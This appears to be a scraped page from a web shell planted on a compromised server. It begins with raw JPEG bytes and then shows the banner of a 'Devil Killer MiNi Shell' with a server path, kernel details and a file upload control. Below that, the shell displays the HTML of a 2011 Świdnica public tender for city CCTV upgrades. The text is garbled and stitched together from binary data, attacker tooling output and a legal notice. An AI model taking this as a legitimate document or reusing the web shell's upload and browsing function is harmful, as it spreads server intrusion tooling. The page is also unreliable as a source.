JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111021/346942-N-2011.html

<p class="kh_header"><b>Świdnica: wykonanie dostaw w ramach zadania:

Rozbudowa i modernizacja monitoringu wizyjnego miasta</b><br>
<b>Numer ogłoszenia: 346942 - 2011; data zamieszczenia: 21.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Świdnicy , ul. Armii Krajowej 49, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8562850, faks 074 8523110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.swidnica.bip-gov.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie dostaw w ramach zadania:

Rozbudowa i modernizacja monitoringu wizyjnego miasta.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i zamontowanie urządzeń do rozbudowy oraz modernizacji monitoringu wizyjnego miasta:

CPV:	71320000-7	-	Usługi inżynieryjne w zakresie projektowania
	45300000-0	-	Roboty instalacyjne w budynkach
	32418000-6	-	Sieć radiowa
	45312330-9	-	Montaż anten radiowych
	45312300-0	-	Instalowanie anten
	32230000-4	-	Radiowa aparatura nadawcza z aparaturą odbiorczą
	32260000-3	-	Urządzenia do przesyłu danych
32323500-8	-	Urządzenia do nadzoru wideo
38651600-9	-	Kamery cyfrowe
w tym:
Zadanie A -	rozbudowa i modernizacja miejskiego monitoringu wizyjnego,
Zadanie B -	dostawa i uruchomienie systemu monitoringu wizyjnego otoczenia obiektów: Szkoły  Podstawowej nr 1 i przyległej Hali Sportowej ŚOSiR.

Zamawiający dopuszcza składania ofert częściowych.
Częściami zamówienia są: Zadanie A oraz Zadanie B opisane w pkt. III specyfikacji i w Opisie Przedmiotu Zamówienia - załącznik nr 6 do SIWZ


2. Zakres przedmiotu zamówienia obejmuje:

Zadanie A:
rozbudowę i modernizację miejskiego monitoringu wizyjnego w szczególności:
a)	modernizację punktów kamerowych wizyjnego monitoringu miejskiego miasta Świdnica 
	w zakresie:
a1)	dostawę 7 kamer szybkoobrotowych, dostawę 1 wideoserwera, dostawę 8 dysków  
		zewnętrznych, 9 aktywnych rozgałęźników sygnału wideo, 1 przełącznika sieciowego,
a2)	demontaż istniejących kamer,
a3)	montaż na istniejących uchwytach dostarczonych kamer, zamianę wideoserwerów,
a4)	konfigurację kamer,
a5)	podłączenie do wideoserwerów, w modernizowanych punktach kamerowych, zewnętrznych dysków twardych do archiwizacji nagrań;
b) uruchomienie 3 punktów kamerowych w zakresie:
b1)	dostawę 1 kamery szybkoobrotowej, 2 kamer sieciowych, 1 dysku zewnętrznego,
		klienckiego zestawu radiowego, 1 aktywnego rozgałęźnika sygnału wideo, 2 przełączników sieciowych,
b2)	montaż i uruchomienie kamer i wideoserwera,
b3)	uruchomienie połączeń radiowych,
b4)	konfigurację systemu monitoringu miejskiego do obsługi nowych kamer.

Zadanie B:
dostawę i uruchomienie systemu monitoringu wizyjnego otoczenia obiektów: Szkoły Podstawowej nr 1 i przyległej Hali Sportowej ŚOSiR, w szczególności:
a)	dostawę urządzeń radiowych i uruchomienie radiowej transmisji wizji, dźwięku i sterowania pomiędzy obiektem i istniejąca stacją bazową sieci monitoringu miejskiego, w tym:
		- 1 radiolinia,
		- 1 sektor stacji bazowej,
		- 1 radiowe urządzenie klienckie,
b)	dostawę i uruchomienie urządzeń do monitorowania otoczenia obiektów, w tym:
		- 4 kamery sieciowe,
		- 1 rejestrator,
c)	dostawę i uruchomienie urządzeń audio do rozgłaszania komunikatów głosowych w miejscach monitorowanych, w tym:
		- 4 głośniki zewnętrzne i wzmacniacze audio,
		- 1 mikrofon pulpitowy z włącznikiem manualnym,
d)	podłączenie do sieci radiowej i odpowiednią konfigurację istniejącego monitoringu Szkoły Podstawowej nr 1, w tym:
		- 1 router z firewallem.

Uwaga:
Należy przeprowadzić szczegółową wizję lokalną terenu celem uzyskania wszystkich informacji koniecznych do przygotowania oferty i zawarcia umowy. Wykonawca ponosi pełną odpowiedzialność za skutki braku lub mylnego rozpoznania warunków realizacji zamówienia.


3. Ogólna charakterystyka dostawy:
Planowane montaże wykonywane będą w wielu budynkach rozmieszczonych na terenie miasta oraz w siedzibie Straży Miejskiej.

4.	Przedmiot zamówienia szczegółowo opisany został w Opisie Przedmiotu Zamówienia stanowiący załącznik nr 6 do niniejszej Specyfikacji.


5. Gwarancja

Zadanie A:
1.	Wykonawca przejmuje zobowiązania gwarancyjne związane z istniejącymi elementami monitoringu miejskiego wynikające z umowy nr 10/VIII/487 z dnia 26.08.2010 r. wynikającej z przetargu nieograniczonego nr 47/VIII/10 z dnia 2 sierpnia 2010 r.
2.	Wykonawca udziela Zamawiającemu gwarancji jakości na wszystkie dostarczone urządzenia i wykonane prace oraz elementy montażowe na następujących warunkach: 
a)	Wykonawca udzieli gwarancji na okres 36 miesięcy licząc od dnia podpisania protokołu końcowego odbioru.
b)	Wykonawca zobowiązuje się wprowadzić zastępczy element systemu na czas naprawy lub wymiany.
c)	Czas naprawy, wymiany elementu na wolny od wad lub wprowadzenia elementu zastępczego uszkodzonych elementów systemu monitoringu nie przekroczy 3 dni od chwili zgłoszenia. 
d)	Jeżeli Wykonawca nie podejmie czynności w terminie 24 godzin od chwili zgłoszenia, Zamawiający będzie miał prawo usunąć wady lub dokonać napraw we własnym zakresie lub powierzyć usunięcie lub dokonanie napraw osobie trzeciej na ryzyko i koszt Wykonawcy. Przez podjęcie czynności należy rozumieć co najmniej dokonanie oględzin i sporządzenie protokołu oraz wskazanie czasu usunięcia usterki.
e)	Wykonawca zobowiąże się, w okresie gwarancyjnym, ponieść koszty wymaganych przeglądów i niezbędnych aktualizacji oprogramowania systemu monitoringu.
f)	Gwarancja obowiązuje przez 7 dni w tygodniu przez 24 godziny na dobę.
g)	Gwarancja nie obejmuje napraw i wymiany elementów, nie wbudowanych przez Wykonawcę.

Zadanie B:
Wykonawca udzieli Zamawiającemu gwarancji jakości na wszystkie dostarczone urządzenia i wykonane prace oraz elementy montażowe na następujących warunkach: 
1.	Wykonawca udzieli gwarancji na okres 36 miesięcy licząc od dnia podpisania protokołu końcowego odbioru.
2.	Wykonawca zobowiązuje się wprowadzić zastępczy element systemu na czas naprawy lub wymiany.
3.	Czas naprawy, wymiany elementu na wolny od wad lub wprowadzenia elementu zastępczego uszkodzonych elementów systemu monitoringu nie przekroczy 3 dni od chwili zgłoszenia. 
4.	Jeżeli Wykonawca nie podejmie czynności w terminie 24 godzin od chwili zgłoszenia, Zamawiający będzie miał prawo usunąć wady lub dokonać napraw we własnym zakresie lub powierzyć usunięcie lub dokonanie napraw osobie trzeciej na ryzyko i koszt Wykonawcy. Przez podjęcie czynności należy rozumieć co najmniej dokonanie oględzin i sporządzenie protokołu oraz wskazanie czasu usunięcia usterki.
5.	Wykonawca zobowiąże się, w okresie gwarancyjnym, ponieść koszty wymaganych przeglądów i niezbędnych aktualizacji oprogramowania systemu monitoringu.
6.	Gwarancja obowiązuje przez 7 dni w tygodniu przez 24 godziny na dobę.
7.	Gwarancja nie obejmuje napraw i wymiany elementów, nie wbudowanych przez Wykonawcę.

6. Warunki realizacji, odbioru i rozliczenia dostawy:


Uwaga:
Warunki realizacji, odbioru i rozliczenia dostawy są identyczne dla obu zadań A i B.

6.1 Warunki realizacji dostawy.
-	Zamawiający zapewnia nadzór inwestorski.
-	Wykonawca zapewni wykonanie montażu przez osoby posiadające odpowiednie kwalifikacje zawodowe i uprawnienia w odpowiednich specjalnościach, zgodnie z wymogami Prawa Budowlanego.
-	Wykonawca zrealizuje prace montażowe zgodnie z reżimem technologicznym, określonym przez Polskie Normy, producentów poszczególnych elementów, produktów, materiałów i urządzeń. 
-	Wszystkie użyte materiały muszą posiadać odpowiedni atest i świadectwo dopuszczenia, wydane przez odpowiednie uprawnione instytucje, zezwalające na stosowanie ich w budownictwie publicznym.
-	Wykonawca jest odpowiedzialny za szkody powstałe w trakcie realizacji zadania również wobec osób trzecich oraz w wyniku nieterminowego ich naprawienia.

6.2 Warunki odbioru dostawy.
-	W dniu zgłoszenia gotowości do odbioru końcowego zadania Wykonawca dostarczy wymagane dokumenty odbiorowe: protokoły techniczne związane z wykonywaniem przedmiotu zamówienia, dokumentację powykonawczą, atesty i aprobaty na wbudowane materiały.
-	Zamawiający przystąpi do czynności odbiorowych przedmiotu zamówienia w terminie do 10 dni roboczych od daty zgłoszenia gotowości do odbioru. Podstawą rozpoczęcia czynności odbioru końcowego będzie zawiadomienie pisemne Wykonawcy.
-	Podstawą do podpisania przez Zamawiającego protokołu końcowego odbioru będzie bezusterkowe wykonanie przedmiotu zamówienia, poparte pomiarami i testami funkcjonalności zgodnie z OPZ.

6.3 Warunki rozliczenia dostawy:
-	Za wykonanie przedmiotu umowy ustala się wynagrodzenie zgodne z ceną ofertową brutto Wykonawcy.
-	Cena ma charakter ryczałtowy.
-	Faktura końcowa może być wystawiona po protokolarnym końcowym odbiorze przez Zamawiającego.
-	Termin płatności faktur ustala się do 14 dni od daty dostarczenia ich Zamawiającemu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza udzielenie zamówień uzupełniających, o którym mowa w art. 67 ust. 1 pkt  1)a), pkt 5) i pkt  6) ustawy z dnia 29.01.2004 r. Prawo Zamówień Publicznych (tekst jednolity: Dz.U. 2010r. Nr 113 poz.759 z późn. zm.).</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 45.30.00.00-0, 32.41.80.00-6, 45.31.23.30-9, 45.31.23.00-0, 32.23.00.00-4, 32.26.00.00-3, 32.32.35.00-8, 38.65.16.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta powinna być zabezpieczona wadium w wysokości: 
- na Zadanie A 1.700,00 zł (słownie: jeden tysiąc siedemset złotych 00/100),
- na Zadanie B 800,00 zł (słownie: osiemset złotych 00/100),
Wadium winno zostać wniesione przed upływem terminu składania ofert, tj przed 02.11. 2011 r. przed godz. 9.00.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie dla Zadania A mogą ubiegać się Wykonawcy, którzy spełniają poniższe warunki:
a) w zakresie posiadania uprawnień do wykonywania określonej działalności: 
	Wykonawca wykaże, że posiada koncesję, udzieloną przez MSWiA, na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia realizowanych w formie zabezpieczenia technicznego
. O zamówienie dla Zadania B mogą ubiegać się Wykonawcy, którzy spełniają poniższe warunki:
a) w zakresie posiadania uprawnień do wykonywania określonej działalności: 
	Wykonawca wykaże, że posiada koncesję, udzieloną przez MSWiA, na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia realizowanych w formie zabezpieczenia technicznego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie dla Zadania A mogą ubiegać się Wykonawcy, którzy spełniają poniższe warunki: Wykonawca wykaże, że w ciągu ostatnich trzech lat wykonał trzy podobne zamówienia, tj. dostawę i uruchomienie systemu złożonego z minimum pięciu kamer pracujących w systemie radiowej transmisji IP, o wartości co najmniej 50 000 zł netto każde. 
O zamówienie dla Zadania B mogą ubiegać się Wykonawcy, którzy spełniają poniższe warunki:
Wykonawca wykaże, że w ciągu ostatnich trzech lat wykonał trzy podobne zamówienia, tj. dostawa i uruchomienie systemu złożonego z minimum 4 kamer sieciowych i 1 rejestratora cyfrowego, pracujących w sieci z transmisją IP, z udziałem cyfrowych łączy bezprzewodowych, o wartości co najmniej 30 000 zł netto każde.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie dla Zadania A mogą ubiegać się Wykonawcy, którzy spełniają poniższe warunki:
Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia, co najmniej: 1 osobą z uprawnieniami budowlanymi w zakresie projektowania w specjalności elektrycznej, 1 osobą z uprawnieniami do eksploatacji urządzeń, instalacji i sieci energetycznych, 2 monterów,
O zamówienie dla Zadania B mogą ubiegać się Wykonawcy, którzy spełniają poniższe warunki:
Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia, co najmniej: 1 osobą z uprawnieniami budowlanymi w zakresie projektowania w specjalności elektrycznej, 1 osobą z uprawnieniami do eksploatacji urządzeń, instalacji i sieci energetycznych, 2 monterów,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie dla Zadania A mogą ubiegać się Wykonawcy, którzy spełniają poniższe warunki:
Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 70.000 zł.
O zamówienie dla Zadania B mogą ubiegać się Wykonawcy, którzy spełniają poniższe warunki:
Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 35.000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca winien do oferty dołączyć:
	- oświadczenia - wg załącznika nr 2 do SIWZ
	- zaparafowany projekt umowy - wg załącznika nr 7 do SIWZ,
	- dowód wniesienia wadium,
	- pełnomocnictwo do działania w imieniu Wykonawcy w przypadku, gdy nie jest to osoba upoważniona do reprezentowania Wykonawcy z mocy prawa,
	-	pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, zgodnie z art. 23 ust. 2 Ustawy w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany umowy w formie pisemnej - aneksem zaakceptowanym przez obie strony w następujących przypadkach:
a) jeżeli zmiana umowy jest korzystna dla Zamawiającego (korzyść ekonomiczna, techniczna, eksploatacyjna),

b)	jeżeli wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisania umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji zamówienia,

c)	Wykonawca może przedłużyć termin wykonania przedmiotu umowy o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w przypadku:
- zawieszenia prac przez Zamawiającego,
- szczególnie niesprzyjających warunków atmosferycznych,


e)	Wykonawca może dokonać zmian osób wykonujących zadanie z zachowaniem właściwych kwalifikacji zawodowych.
3.	Zmiany w umowie mogą być dopuszczone wyłącznie pod warunkiem złożenia wniosku przez Wykonawcę i po akceptacji Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
